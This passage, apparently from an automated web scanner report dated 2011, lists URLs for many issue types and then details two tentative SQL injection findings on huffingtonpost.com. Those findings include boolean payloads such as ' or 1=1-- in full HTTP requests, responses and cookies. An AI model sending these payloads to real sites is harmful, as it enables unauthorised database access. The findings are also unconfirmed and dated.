20.387. http://www.facebook.com/plugins/like.php

20.388. http://www.facebook.com/plugins/like.php

20.389. http://www.facebook.com/plugins/like.php

20.390. http://www.facebook.com/plugins/like.php

20.391. http://www.facebook.com/plugins/like.php

20.392. http://www.facebook.com/plugins/like.php

20.393. http://www.facebook.com/plugins/like.php

20.394. http://www.facebook.com/plugins/like.php

20.395. http://www.facebook.com/plugins/like.php

20.396. http://www.facebook.com/plugins/like.php

20.397. http://www.facebook.com/plugins/like.php

20.398. http://www.facebook.com/plugins/like.php

20.399. http://www.facebook.com/plugins/like.php

20.400. http://www.facebook.com/plugins/like.php

20.401. http://www.facebook.com/plugins/like.php

20.402. http://www.facebook.com/plugins/like.php

20.403. http://www.facebook.com/plugins/like.php

20.404. http://www.facebook.com/plugins/like.php

20.405. http://www.facebook.com/plugins/like.php

20.406. http://www.facebook.com/plugins/like.php

20.407. http://www.facebook.com/plugins/like.php

20.408. http://www.facebook.com/plugins/like.php

20.409. http://www.facebook.com/plugins/like.php

20.410. http://www.facebook.com/plugins/like.php

20.411. http://www.facebook.com/plugins/like.php

20.412. http://www.facebook.com/plugins/like.php

20.413. http://www.facebook.com/plugins/like.php

20.414. http://www.facebook.com/plugins/like.php

20.415. http://www.facebook.com/plugins/like.php

20.416. http://www.facebook.com/plugins/like.php

20.417. http://www.facebook.com/plugins/like.php

20.418. http://www.facebook.com/plugins/like.php

20.419. http://www.facebook.com/plugins/like.php

20.420. http://www.facebook.com/plugins/like.php

20.421. http://www.facebook.com/plugins/like.php

20.422. http://www.facebook.com/plugins/like.php

20.423. http://www.facebook.com/plugins/like.php

20.424. http://www.facebook.com/plugins/like.php

20.425. http://www.facebook.com/plugins/likebox.php

20.426. http://www.facebook.com/plugins/likebox.php

20.427. http://www.facebook.com/plugins/likebox.php

20.428. http://www.facebook.com/plugins/likebox.php

20.429. http://www.facebook.com/plugins/likebox.php

20.430. http://www.facebook.com/plugins/likebox.php

20.431. http://www.facebook.com/plugins/likebox.php

20.432. http://www.facebook.com/plugins/likebox.php

20.433. http://www.facebook.com/plugins/likebox.php

20.434. http://www.facebook.com/plugins/likebox.php

20.435. http://www.facebook.com/plugins/likebox.php

20.436. http://www.facebook.com/plugins/likebox.php

20.437. http://www.facebook.com/plugins/likebox.php

20.438. http://www.facebook.com/plugins/likebox.php

20.439. http://www.facebook.com/plugins/likebox.php

20.440. http://www.facebook.com/plugins/likebox.php

20.441. http://www.facebook.com/plugins/likebox.php

20.442. http://www.facebook.com/plugins/likebox.php

20.443. http://www.facebook.com/plugins/likebox.php

20.444. http://www.facebook.com/plugins/likebox.php

20.445. http://www.facebook.com/plugins/likebox.php

20.446. http://www.facebook.com/plugins/likebox.php

20.447. http://www.facebook.com/plugins/likebox.php

20.448. http://www.facebook.com/plugins/likebox.php

20.449. http://www.facebook.com/plugins/likebox.php

20.450. http://www.facebook.com/plugins/likebox.php

20.451. http://www.facebook.com/plugins/likebox.php

20.452. http://www.facebook.com/plugins/likebox.php

20.453. http://www.facebook.com/plugins/likebox.php

20.454. http://www.facebook.com/plugins/likebox.php

20.455. http://www.facebook.com/plugins/likebox.php

20.456. http://www.facebook.com/plugins/likebox.php

20.457. http://www.facebook.com/plugins/likebox.php

20.458. http://www.facebook.com/plugins/likebox.php

20.459. http://www.facebook.com/plugins/likebox.php

20.460. http://www.facebook.com/plugins/likebox.php

20.461. http://www.facebook.com/plugins/likebox.php

20.462. http://www.facebook.com/plugins/likebox.php

20.463. http://www.facebook.com/plugins/likebox.php

20.464. http://www.facebook.com/plugins/likebox.php

20.465. http://www.facebook.com/plugins/likebox.php

20.466. http://www.facebook.com/plugins/likebox.php

20.467. http://www.facebook.com/plugins/likebox.php

20.468. http://www.facebook.com/plugins/likebox.php

20.469. http://www.facebook.com/plugins/likebox.php

20.470. http://www.facebook.com/plugins/likebox.php

20.471. http://www.facebook.com/plugins/likebox.php

20.472. http://www.facebook.com/plugins/likebox.php

20.473. http://www.facebook.com/plugins/likebox.php

20.474. http://www.facebook.com/plugins/likebox.php

20.475. http://www.facebook.com/plugins/likebox.php

20.476. http://www.facebook.com/plugins/likebox.php

20.477. http://www.facebook.com/plugins/likebox.php

20.478. http://www.facebook.com/plugins/likebox.php

20.479. http://www.facebook.com/plugins/likebox.php

20.480. http://www.facebook.com/plugins/likebox.php

20.481. http://www.facebook.com/plugins/likebox.php

20.482. http://www.facebook.com/plugins/likebox.php

20.483. http://www.facebook.com/plugins/likebox.php

20.484. http://www.facebook.com/plugins/likebox.php

20.485. http://www.facebook.com/plugins/likebox.php

20.486. http://www.facebook.com/plugins/likebox.php

20.487. http://www.facebook.com/plugins/likebox.php

20.488. http://www.facebook.com/plugins/likebox.php

20.489. http://www.facebook.com/plugins/likebox.php

20.490. http://www.facebook.com/plugins/likebox.php

20.491. http://www.facebook.com/plugins/likebox.php

20.492. http://www.facebook.com/plugins/likebox.php

20.493. http://www.facebook.com/plugins/likebox.php

20.494. http://www.facebook.com/plugins/likebox.php

20.495. http://www.facebook.com/plugins/likebox.php

20.496. http://www.facebook.com/plugins/likebox.php

20.497. http://www.facebook.com/plugins/likebox.php

20.498. http://www.facebook.com/plugins/likebox.php

20.499. http://www.facebook.com/plugins/likebox.php

20.500. http://www.facebook.com/plugins/likebox.php

20.501. http://www.facebook.com/plugins/likebox.php

20.502. http://www.facebook.com/plugins/likebox.php

20.503. http://www.facebook.com/plugins/likebox.php

20.504. http://www.facebook.com/plugins/likebox.php

20.505. http://www.facebook.com/plugins/likebox.php

20.506. http://www.facebook.com/plugins/likebox.php

20.507. http://www.facebook.com/plugins/recommendations.php

20.508. http://www.facebook.com/plugins/recommendations.php

20.509. http://www.facebook.com/plugins/recommendations.php

20.510. http://www.facebook.com/plugins/recommendations.php

20.511. http://www.facebook.com/plugins/recommendations.php

20.512. http://www.facebook.com/plugins/recommendations.php

20.513. http://www.facebook.com/plugins/recommendations.php

20.514. http://www.facebook.com/plugins/recommendations.php

20.515. http://www.facebook.com/plugins/send.php

20.516. http://www.facebook.com/plugins/send.php

20.517. http://www.facebook.com/plugins/send.php

20.518. http://www.facebook.com/plugins/send.php

20.519. http://www.facebook.com/plugins/send.php

20.520. http://www.facebook.com/plugins/send.php

20.521. http://www.facebook.com/plugins/send.php

20.522. http://www.facebook.com/plugins/send.php

20.523. http://www.facebook.com/plugins/send.php

20.524. http://www.facebook.com/plugins/send.php

20.525. http://www.facebook.com/plugins/send.php

20.526. http://www.facebook.com/plugins/send.php

20.527. http://www.facebook.com/plugins/send.php

20.528. http://www.facebook.com/plugins/send.php

20.529. http://www.facebook.com/plugins/send.php

20.530. http://www.facebook.com/plugins/send.php

20.531. http://www.facebook.com/plugins/send.php

20.532. http://www.facebook.com/plugins/send.php

20.533. http://www.facebook.com/plugins/send.php

20.534. http://www.facebook.com/plugins/send.php

20.535. http://www.facebook.com/plugins/send.php

20.536. http://www.facebook.com/plugins/send.php

20.537. http://www.facebook.com/plugins/send.php

20.538. http://www.facebook.com/plugins/send.php

20.539. http://www.facebook.com/plugins/send.php

20.540. http://www.facebook.com/plugins/send.php

20.541. http://www.facebook.com/plugins/send.php

20.542. http://www.facebook.com/plugins/send.php

20.543. http://www.facebook.com/plugins/send.php

20.544. http://www.facebook.com/plugins/send.php

20.545. http://www.facebook.com/plugins/send.php

20.546. http://www.facebook.com/plugins/send.php

20.547. http://www.facebook.com/plugins/send.php

20.548. http://www.facebook.com/plugins/send.php

20.549. http://www.facebook.com/plugins/send.php

20.550. http://www.facebook.com/plugins/send.php

20.551. http://www.facebook.com/plugins/send.php

20.552. http://www.facebook.com/plugins/send.php

20.553. http://www.facebook.com/plugins/send.php

20.554. http://www.facebook.com/plugins/send.php

20.555. http://www.facebook.com/plugins/send.php

20.556. http://www.facebook.com/plugins/send.php

20.557. http://www.facebook.com/plugins/send.php

20.558. http://www.facebook.com/plugins/send.php

20.559. http://www.facebook.com/plugins/send.php

20.560. http://www.facebook.com/plugins/send.php

20.561. http://www.facebook.com/plugins/send.php

20.562. http://www.facebook.com/plugins/send.php

20.563. http://www.facebook.com/plugins/send.php

20.564. http://www.facebook.com/plugins/send.php

20.565. http://www.facebook.com/plugins/send.php

20.566. http://www.facebook.com/plugins/send.php

20.567. http://www.facebook.com/plugins/send.php

20.568. http://www.facebook.com/plugins/send.php

20.569. http://www.facebook.com/plugins/send.php

20.570. http://www.facebook.com/plugins/send.php

20.571. http://www.facebook.com/plugins/send.php

20.572. http://www.facebook.com/plugins/send.php

20.573. http://www.facebook.com/plugins/send.php

20.574. http://www.facebook.com/plugins/send.php

20.575. http://www.facebook.com/plugins/send.php

20.576. http://www.facebook.com/plugins/send.php

20.577. http://www.facebook.com/plugins/send.php

20.578. http://www.facebook.com/plugins/send.php

20.579. http://www.facebook.com/plugins/send.php

20.580. http://www.facebook.com/plugins/send.php

20.581. http://www.facebook.com/plugins/send.php

20.582. http://www.facebook.com/plugins/send.php

20.583. http://www.facebook.com/plugins/send.php

20.584. http://www.facebook.com/plugins/send.php

20.585. http://www.facebook.com/plugins/send.php

20.586. http://www.facebook.com/plugins/send.php

20.587. http://www.facebook.com/plugins/send.php

20.588. http://www.facebook.com/plugins/send.php

20.589. http://www.facebook.com/plugins/send.php

20.590. http://www.facebook.com/plugins/send.php

20.591. http://www.facebook.com/plugins/send.php

20.592. http://www.facebook.com/plugins/send.php

20.593. http://www.facebook.com/plugins/send.php

20.594. http://www.facebook.com/plugins/send.php

20.595. http://www.facebook.com/plugins/send.php

20.596. http://www.facebook.com/plugins/send.php

20.597. http://www.facebook.com/plugins/send.php

20.598. http://www.facebook.com/plugins/send.php

20.599. http://www.facebook.com/plugins/send.php

20.600. http://www.facebook.com/plugins/send.php

20.601. http://www.facebook.com/plugins/send.php

20.602. http://www.facebook.com/policy.php

20.603. http://www.facebook.com/privacy/explanation.php

20.604. http://www.facebook.com/profile.php

20.605. http://www.facebook.com/profile.php

20.606. http://www.facebook.com/profile.php

20.607. http://www.facebook.com/r.php

20.608. http://www.facebook.com/r.php

20.609. http://www.facebook.com/r.php

20.610. http://www.facebook.com/r.php

20.611. http://www.facebook.com/r.php

20.612. http://www.facebook.com/recover.php

20.613. http://www.facebook.com/recover.php

20.614. http://www.facebook.com/recover.php

20.615. http://www.facebook.com/robynalys

20.616. http://www.facebook.com/share.php

20.617. http://www.facebook.com/share.php

20.618. http://www.facebook.com/share.php

20.619. http://www.facebook.com/sharer.php

20.620. http://www.facebook.com/sharer.php

20.621. http://www.facebook.com/sharer.php

20.622. http://www.facebook.com/sharer.php

20.623. http://www.facebook.com/skdarealist

20.624. http://www.facebook.com/sportingnews

20.625. http://www.facebook.com/stefanoboscolomarchi

20.626. http://www.facebook.com/techcrunch

20.627. http://www.facebook.com/terms.php

20.628. http://www.facebook.com/terms.php

20.629. http://www.facebook.com/terms.php

20.630. http://www.facebook.com/terms.php

20.631. http://www.facebook.com/theteebers

20.632. http://www.facebook.com/wmoppert

20.633. https://www.facebook.com/

20.634. https://www.facebook.com/

20.635. https://www.facebook.com/ajax/intl/language_dialog.php

20.636. https://www.facebook.com/ajax/intl/language_dialog.php

20.637. https://www.facebook.com/ajax/intl/language_dialog.php

20.638. https://www.facebook.com/captcha/tfbimage.php

20.639. https://www.facebook.com/favicon.ico

20.640. https://www.facebook.com/favicon.ico

20.641. https://www.facebook.com/h02332

20.642. https://www.facebook.com/h02332

20.643. https://www.facebook.com/h02332

20.644. https://www.facebook.com/help/contact.php

20.645. https://www.facebook.com/login.php

20.646. https://www.facebook.com/login.php

20.647. https://www.facebook.com/login.php

20.648. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

20.649. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

20.650. https://www.facebook.com/pages/create.php

20.651. https://www.facebook.com/pages/create.php

20.652. https://www.facebook.com/pages/create.php

20.653. https://www.facebook.com/r.php

20.654. https://www.facebook.com/r.php

20.655. https://www.facebook.com/r.php

20.656. https://www.facebook.com/recover.php

20.657. https://www.facebook.com/recover.php

20.658. http://www.google.com/sdch/rU20-FBA.dct

21. Credit card numbers disclosed

21.1. http://www.facebook.com/directory/pages/

21.2. http://www.facebook.com/directory/people/

22. Robots.txt file

22.1. http://www.aolnews.com/

22.2. http://www.apple.com/itunes/affiliates/download/

22.3. http://www.bankrate.com/funnel/mortgages/

22.4. http://www.blogger.com/blog-post-reactions.g

22.5. http://www.citysbest.com/

22.6. http://www.crunchboard.com/opening/detailjob.php

22.7. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

22.8. http://www.dailyfinance.com/

22.9. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

22.10. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

22.11. http://www.facebook.com/extern/login_status.php

22.12. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

22.13. http://www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

22.14. http://www.fiddler2.com/fiddler2/updatecheck.asp

22.15. http://www.flickr.com/badge_code_v2.gne

22.16. http://www.ft.com/cms/s/0/18b96d66-76a2-11e0-bd5d-00144feabdc0.html

22.17. http://www.games.com/game/family-feud/

22.18. https://www.godaddy.com/

22.19. http://www.google-analytics.com/__utm.gif

22.20. http://www.google.com/aclk

22.21. http://www.googleadservices.com/pagead/conversion/1034849195/

22.22. http://www.huffingtonpost.com/

22.23. http://www.ibm.com/systems/info/x86servers/blades/networking/index.html

22.24. http://www.mapquest.com/

22.25. http://www.marketwatch.com/News/Story/Story.aspx

22.26. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

22.27. http://www.moviefone.com/

22.28. https://www.neodata.com/pub/snew/new_print.shtml

22.29. http://www.netvibes.com/subscribe.php

22.30. http://www.newsgator.com/ngs/subscriber/subext.aspx

22.31. http://www.popeater.com/

22.32. http://www.realtytrac.com/birdseyeimage/propertyimage.aspx

22.33. http://www.top-sec.com/vb/clientscript/ncode_imageresizer.js

22.34. http://www.truveo.com/search

22.35. http://www.tuaw.com/hub/app-reviews

22.36. http://xml.truveo.com/apiv3

22.37. http://yellowpages.aol.com/

23. Cacheable HTTPS response

23.1. https://www.facebook.com/ajax/intl/language_dialog.php

23.2. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

23.3. https://www.fightmagazine.com/mma-magazine/subscribe.asp

23.4. https://www.neodata.com/pub/snew/new_print.shtml

24. HTML does not specify charset

24.1. http://www.aol.com/ads/load_v7.html

24.2. http://www.dailyfinance.com/_uac/adpage.html

24.3. http://www.huffingtonpost.com/ed-schultz/president-obama-and-ameri_b_856947.html

24.4. http://www.mapquest.com/cdn/_uac/adpage.htm

24.5. http://www.mmafighting.com/_uac/adpage.html

24.6. https://www.neodata.com/pub/snew/new_print.shtml

24.7. http://www.opselect.com/ad_feedback/survey.adp

25. Content type incorrectly stated

25.1. http://www.aol.com/ajax.jsp

25.2. http://www.blogsmithmedia.com/realestate.aol.com/blog/media/alec-foege.gif

25.3. http://www.facebook.com/extern/login_status.php

25.4. http://www.fiddler2.com/fiddler2/updatecheck.asp

25.5. http://www.google.com/buzz/api/button.js

25.6. http://www.huffingtonpost.com/ads/check_flights.php

25.7. http://www.huffingtonpost.com/badge/badges_json_v2.php

25.8. http://www.huffingtonpost.com/include/mod_times.php

25.9. http://www.mapquest.com/_svc/searchio

25.10. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

26. Content type is not specified



1. SQL injection  next
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?icid=navbar_huffpo_main5&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:16:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=47570434?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {                            
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>
   
<div class="main_big_news_ontop" id="topnav_big_news_module">


<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

Request 2

GET /?icid=navbar_huffpo_main5&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 01:16:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=78811701?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {                            
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>
   
<div class="main_big_news_ontop" id="topnav_big_news_module">


<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

1.2. http://www.huffingtonpost.com/threeup.php [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.huffingtonpost.com
Path:   /threeup.php

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 83591090'%20or%201%3d1--%20 and 83591090'%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d1--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 7160

       <div id="857693" class="grid third flush_top threeup_entries">
           <div id="entry_857693" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273918/thumbs/r-LIBYA-INTERNATIONAL-AID-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">LIBYA TARGETS AID SHIP</a></h5>
           </div>
       </div>        <div id="857719" class="grid third flush_top threeup_entries">
           <div id="entry_857719" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273951/thumbs/r-OSAMA-BIN-LADEN-PHOTOS-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">GRAPHIC: Photos Show 3 Dead Men At Bin Laden Compound</a></h5>
           </div>
       </div>        <div id="857555" class="grid third flush_top threeup_entries">
           <div id="entry_857555" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273798/thumbs/r-AFGHANISTAN-PAKISTAN-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/afghan
...[SNIP]...

Request 2

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d2--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
